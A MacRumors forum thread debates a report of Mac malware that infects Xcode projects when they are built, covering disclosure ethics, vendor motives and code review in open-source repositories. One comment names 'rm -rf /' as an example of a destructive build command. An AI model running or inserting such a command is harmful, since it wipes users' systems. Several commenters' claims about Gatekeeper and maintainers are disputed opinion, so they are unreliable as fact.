Don't confuse journalists with bloggers.
Got a tip for us?
Let us know
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.
New Mac Malware Found to Infect via Xcode
- Thread starter MacRumors
- Start date
- Sort by reaction score
Don't confuse journalists with bloggers.
This kind of reporting is very frustrating. The lengthy discussion of how the virus works should only come AFTER a description of how to detect the virus and deal with with.
[automerge]1597681696[/automerge]
[automerge]1597681696[/automerge]
no excuse
When did the world get so paranoid as to see conspiracies absolutely everywhere?
If Trend Micro had said “we found a very very bad malware that we can‘t disclose and it affects applications you would never have suspected but if you buy our product you’ll be protected”, then that would be FUD.
FUD is fear, uncertainty and doubt. I don’t see any of those here. I see a company that specializes in malware reporting a finding. By telling you they found it in 2 repos, they are reducing both the fear and the uncertainty.
Trend is doing us a service by reporting the threat. You can decide how big of a threat it is to you and how you want to respond to it. To me, this proves a concept. Sure it may not be widespread, but it doesn’t do us much good if Trend waits until we’re all infected to tell us about it.
As far as hawking their products, I’m not sure what the problem is. Those products pay for their ability to find these things. And there are plenty of bad actors in the world creating malware, Trend doesn’t need to leak the disease so they can sell the cure like some Bond supervillian.
Ironically, it’s your post that more closely hews to the definition of FUD. Fear of the corporation, uncertainty of whether we can trust what’s really happening, doubting the legitimacy of the reports.
Unfortunately there's plenty of nuts out there, some of them might be justified, others not so much.
It sounds like you might be new to infosec so let me help you out. Apple and other corporations have bug bounty programs exactly for this very reason, so researchers can get paid for their discoveries. You're making it seem like Trend is doing the world a favor here.
Trend Micro is also claiming there's two, 0 Day vulnerabilities in Apple's Data Vault and Safari that this malware is exploiting. That's the real meat here but with very little substance. Apple has GateKeeper built into modern OS versions to easily kill these sorts of malware based on their signatures.
FWIW consumers are terrible at making good decisions. Most people don't even update their software regularly and you want them to decide how big of a security threat something is? Have you actually worked in corporate IT?
I'm not against the discovery of new threats and I also have zero problem with them making money. What I am against is how they disclosed it. If Trend would have said "we've also let Apple know about our findings so they can update gatekeeper, etc but in the meantime, here's our software to help..." yeh, I can get behind that. It's not the way proper infosec disclosure is done.
Some of these "0days" these days are getting air time when they're not even bugs at all. Security companies love to build up hype for themselves.
Sadly, you might be right here. This is all headlines meant for emotional impact and no substance whatsoever. I mark this as BS and my trust in Trend Micro is down, down, down.
The article says, “when the project is built, the malicious code is run”. I take this to mean there’s some facility in the file(s) which describe to the system how to build the project (old school this would be a Makefile, these days Xcode has some sort of equivalent file to specify dependencies and such)... the implication is that this facility allows specifying arbitrary shell commands, to run during the build process. If this is the case, one could easily damage a system by specifying a “do this before building” command like, “rm -rf /”. Or one could construct a more complicated command to do something even more nefarious. I don’t know if this is what’s going on, but the article does indicate that merely building the project sets the malware in action.
./configure.sh is a plain text bash file. The only way it can spread virus is when incompetent software maintainers didn't look at it or know what it does.
As far as I understand the vulnerability (the link didn't explain it very well), the virus comes from a plain text script in the github repository, which is used by Xcode when building an app. So, some developer pushed it to some GitHub repository, and maintainers for that repository didn't catch it. You are not gonna see malware in carefully maintained and trusted GitHub repositories.
So is this fishy, is it FUD, or is it the fact that they didn't headline that they contacted Apple? Trend didn't put this in front of consumers, MR did. It seems like the fact that there is bad code lurking in XCode project files and it already exists in the wild is something developers should know.
You tell Apple when you find something first, before it's in the wild. That's what the bug bounty program is for. If it's already in the wild, you tell people to take precautions. That's what this press release did.
Since you seem to have studied this with an expert infosec eye, can you point out what, exactly, Gatekeeper is going to kill? I just did a quick read of the details, so I may have missed the chokepoint, but this looks to me like a bunch of code compiled and run by the local user as part of their own Xcode build that replicates itself through all of that users Xcode projects. Unless you're Vlad.
Last edited:
Windows 10 filled with bugs and error which is why I use MacOS. MacOS is not filled with viruses, if you bothered to read the article instead of trolling.
I've been virus and antivirus free for 20 years and intend to keep that trend!
Do you think all open source projects are taken care by competent software maintainers?
Most of these projects are handled on a voluntary time-available basis on their spare times on top of some day-job doing something else. Lookup what happened during Heartbleed for a good example.
It only takes one line in a "plain text bash file" to download some library to include in the compiled project.
I can’t figure out what aspect of Mac Malware you’re taking about. If you’re referring to the MacRumors site itself, go post in the Site and Forum Feedback subforum - if you make such comments/requests in the middle of the comment section on unrelated stories, you’re pretty much guaranteed the site admins will never notice it.
It only takes one competent reviewer to find the faulty commit.
PS: I'm saying that maintainers have that responsibilty. If they don't have expertise or time, archive the project or find someone else.
Sounds like an overblown risk to me. Sure, Apple should look into the attack vector, but ultimately code that is used in a project is either already well established in the industry, or closely vetted if it's actually needed. An obscure repo with little history would have to offer something really interesting to make it into a project.
Sounds a lot like snake oil salesmen to me.
Sounds a lot like snake oil salesmen to me.